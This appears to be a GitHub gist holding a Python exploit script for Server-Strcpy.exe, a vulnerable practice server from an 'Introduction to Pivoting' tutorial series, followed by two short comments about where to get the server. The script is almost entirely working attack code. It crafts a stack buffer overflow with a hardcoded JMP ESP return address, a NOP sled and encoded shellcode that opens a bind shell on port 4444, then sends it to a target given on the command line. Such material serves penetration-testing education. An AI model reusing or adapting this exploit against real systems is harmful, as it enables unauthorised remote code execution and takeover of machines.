Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
# 368 bytes, opens a bind TCP shell on port 4444
shellcode = (
"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\x7d\x06\xb8\x9b" +
"\x95\x4f\x43\x64\x65\x30\xcd\x81\x54\x62\xa9\xc2\xc4\xb2" +
"\xb9\x87\xe4\x39\xef\x33\x7f\x4f\x38\x33\xc8\xfa\x1e\x7a" +
"\xc9\xca\x9e\xd0\x09\x4c\x63\x2b\x5d\xae\x5a\xe4\x90\xaf" +
"\x9b\x19\x5a\xfd\x74\x55\xc8\x12\xf0\x2b\xd0\x13\xd6\x27" +
"\x68\x6c\x53\xf7\x1c\xc6\x5a\x28\x8c\x5d\x14\xd0\xa7\x3a" +
"\x85\xe1\x64\x59\xf9\xa8\x01\xaa\x89\x2a\xc3\xe2\x72\x1d" +
"\x2b\xa8\x4c\x91\xa6\xb0\x89\x16\x58\xc7\xe1\x64\xe5\xd0" +
"\x31\x16\x31\x54\xa4\xb0\xb2\xce\x0c\x40\x17\x88\xc7\x4e" +
"\xdc\xde\x80\x52\xe3\x33\xbb\x6f\x68\xb2\x6c\xe6\x2a\x91" +
"\xa8\xa2\xe9\xb8\xe9\x0e\x5c\xc4\xea\xf7\x01\x60\x60\x15" +
"\x56\x12\x2b\x72\x9b\x29\xd4\x82\xb3\x3a\xa7\xb0\x1c\x91" +
"\x2f\xf9\xd5\x3f\xb7\xfe\xcc\xf8\x27\x01\xee\xf8\x6e\xc6" +
"\xba\xa8\x18\xef\xc2\x22\xd9\x10\x17\xe4\x89\xbe\xc7\x45" +
"\x7a\x7f\xb7\x2d\x90\x70\xe8\x4e\x9b\x5a\x9f\x48\x55\xbe" +
"\xcc\x3e\x94\x40\xe3\xe2\x11\xa6\x69\x0b\x74\x70\x05\xe9" +
"\xa3\x49\xb2\x12\x86\xe5\x6b\x85\x9e\xe3\xab\xaa\x1e\x26" +
"\x98\x07\xb6\xa1\x6a\x44\x03\xd3\x6d\x41\x23\x9a\x56\x02" +
"\xb9\xf2\x15\xb2\xbe\xde\xcd\x57\x2c\x85\x0d\x11\x4d\x12" +
"\x5a\x76\xa3\x6b\x0e\x6a\x9a\xc5\x2c\x77\x7a\x2d\xf4\xac" +
"\xbf\xb0\xf5\x21\xfb\x96\xe5\xff\x04\x93\x51\x50\x53\x4d" +
"\x0f\x16\x0d\x3f\xf9\xc0\xe2\xe9\x6d\x94\xc8\x29\xeb\x99" +
"\x04\xdc\x13\x2b\xf1\x99\x2c\x84\x95\x2d\x55\xf8\x05\xd1" +
"\x8c\xb8\x36\x98\x8c\xe9\xde\x45\x45\xa8\x82\x75\xb0\xef" +
"\xba\xf5\x30\x90\x38\xe5\x31\x95\x05\xa1\xaa\xe7\x16\x44" +
"\xcc\x54\x16\x4d")
# JMP ESP at 77DF2740
buffer = "\x41" * 268 + "\x40\x27\xDF\x77"
buffer += "\x90" * 20 + shellcode + "\xCC" * 819
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, int(port)))
print "[+] sending payload of length", len(buffer)
s.send(buffer)
s.close()
print "[+] done"
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
@samouelll

This comment has been minimized.

Copy link

samouelll commented Nov 18, 2017

hi.
where is source code of strcpy.server.exe?

@gabrielem

This comment has been minimized.

Copy link

gabrielem commented Dec 15, 2019

hi.
where is source code of strcpy.server.exe?
http://code.securitytube.net/Server-Strcpy.exe

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.